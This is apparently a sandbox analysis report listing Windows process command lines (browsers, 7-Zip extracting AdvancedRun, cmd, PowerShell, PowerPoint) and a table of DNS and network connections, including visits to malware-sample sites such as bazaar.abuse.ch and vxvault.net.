"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=3248 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=3984 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=4968 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5668 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=5048 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4696 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f0 0x4c4
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6280 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\advancedrun-x64\" -spe -an -ai#7zMap21697:92:7zEvent13707
C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe
"C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe"
C:\Windows\system32\cmd.exe
"cmd.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault037237eah27e8h403chbb49haa253b5c0bb1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff996c046f8,0x7ff996c04708,0x7ff996c04718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,3363053809461646320,3408107611197097556,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,3363053809461646320,3408107611197097556,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,3363053809461646320,3408107611197097556,131072 --lang=de --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s LxpSvc
C:\Windows\system32\cmd.exe
"cmd.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=5824 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=1672 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6952 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99a76ab58,0x7ff99a76ab68,0x7ff99a76ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2252 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3000 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3036 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99a76ab58,0x7ff99a76ab68,0x7ff99a76ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1384 --field-trial-handle=1952,i,9704593771610671443,2998305469192196698,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,9704593771610671443,2998305469192196698,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2296 --field-trial-handle=1952,i,9704593771610671443,2998305469192196698,131072 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 2792
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.66.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.187.238:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bonzi.link | udp |
| FR | 151.106.4.82:443 | bonzi.link | tcp |
| FR | 151.106.4.82:443 | bonzi.link | tcp |
| FR | 151.106.4.82:443 | bonzi.link | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | d36ee2fcip1434.cloudfront.net | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 82.4.106.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| FR | 151.106.4.82:80 | bonzi.link | tcp |
| FR | 151.106.4.82:80 | bonzi.link | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 70.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 172.217.15.227:443 | csi.gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.15.217.172.in-addr.arpa | udp |
| FR | 151.106.4.82:80 | bonzi.link | tcp |
| FR | 151.106.4.82:80 | bonzi.link | tcp |
| FR | 151.106.4.82:80 | bonzi.link | tcp |
| US | 172.217.15.227:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 172.217.16.238:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.200.35:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.35:443 | id.google.com | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 151.101.130.49:443 | bazaar.abuse.ch | tcp |
| US | 151.101.130.49:443 | bazaar.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 35.215.58.216.in-addr.arpa | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c24.gcp.gvt2.com | udp |
| US | 35.185.21.228:443 | e2c24.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 228.21.185.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons5.gvt3.com | udp |
| FR | 172.217.18.195:443 | beacons5.gvt3.com | tcp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.18.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | e2c74.gcp.gvt2.com | udp |
| FR | 34.1.15.89:443 | e2c74.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 89.15.1.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| US | 216.239.36.117:443 | beacons2.gvt2.com | tcp |
| US | 216.239.36.117:443 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.36.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | repository-images.githubusercontent.com | udp |
| US | 185.199.109.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | repository-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c68.gcp.gvt2.com | udp |
| ZA | 34.35.20.64:443 | e2c68.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 64.20.35.34.in-addr.arpa | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | 90.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | erzurum.us | udp |
| US | 172.234.222.138:443 | erzurum.us | tcp |
| US | 172.234.222.138:443 | erzurum.us | tcp |
| US | 8.8.8.8:53 | vxvault.net | udp |
| IS | 82.221.129.39:443 | vxvault.net | tcp |
| IS | 82.221.129.39:443 | vxvault.net | tcp |
| GB | 216.58.212.195:80 | www.gstatic.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c56.gcp.gvt2.com | udp |
| ES | 34.0.206.140:443 | e2c56.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 39.129.221.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.206.0.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| US | 172.234.222.143:443 | erzurum.us | tcp |
| US | 172.234.222.143:443 | erzurum.us | tcp |
| GB | 142.250.187.206:443 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| US | 172.234.222.138:443 | erzurum.us | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 172.234.222.143:443 | erzurum.us | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | www.nirsoft.net | udp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| US | 8.8.8.8:53 | s7.addthis.com | udp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| NL | 23.216.252.74:443 | s7.addthis.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 29.181.128.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.252.216.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 6.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| US | 142.250.96.94:443 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | 94.96.250.142.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 216.239.32.3:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | 3.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r4---sn-aigl6nsk.gvt1.com | udp |
| GB | 74.125.105.105:443 | r4---sn-aigl6nsk.gvt1.com | udp |
| US | 8.8.8.8:53 | 105.105.125.74.in-addr.arpa | udp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 216.239.32.3:443 | csi.gstatic.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | lens.google.com | udp |
| GB | 172.217.169.14:443 | lens.google.com | tcp |
| US | 8.8.8.8:53 | 14.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn1.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn2.gstatic.com | udp |
| GB | 142.250.180.14:443 | encrypted-tbn2.gstatic.com | tcp |
| GB | 142.250.180.14:443 | encrypted-tbn2.gstatic.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | ges-huellhorst.de | udp |
| DE | 81.169.145.88:443 | ges-huellhorst.de | tcp |
| US | 8.8.8.8:53 | 88.145.169.81.in-addr.arpa | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | tcp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
